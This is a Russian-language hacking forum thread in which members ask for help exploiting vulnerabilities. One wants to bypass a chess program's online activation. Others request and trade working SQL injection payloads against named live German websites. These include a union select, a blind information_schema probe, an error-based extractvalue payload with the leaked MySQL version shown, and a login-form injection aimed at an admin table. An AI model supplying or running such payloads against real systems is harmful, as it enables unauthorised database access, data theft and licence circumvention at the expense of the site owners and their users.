Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ura122

    ura122 Member

    Joined:
    14 May 2020
    Messages:
    9
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, есть шахматная программа, которая требует онлайн-активации. Выяснил, что при вводе 25-значного ключа в программу, активация проходит с помощью проверки данного ключа вот по этому адресу: http://chess-cheat.com/test.php . При каждом обновлении данной страницы в браузере генерируется MD5 хеш 6-ти значных чисел и еще какие-то случайные цифры. Есть ли какие-то мысли об уязвимости?
     
  2. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    6
    Likes Received:
    6
    Reputations:
    1
    Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection
     
    xuanruou, crlf and Baskin-Robbins like this.
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,246
    Likes Received:
    427
    Reputations:
    233
    Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...
    Code:
    https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
    Code:
    https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Тут только слепая

    tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if((select+count(*)+from+information_schema.tables+limit+0,1)=307,1,2)=1+--+
     
    _________________________
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,246
    Likes Received:
    427
    Reputations:
    233
    Помогите, что можно сделать? вывод в коде
    Code:
    view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
    Code:
    SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
     
  6. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
    help to inject here "from admin"

    return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0))having+avg(0)%23&password=dsadsada

    return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Немного извращенно, но работать будет

    /poi/extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262

    Code:
    XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'</span>' (46 chars)
    we are need full url for understanding filters
     
    _________________________
  8. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
  9. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
Loading...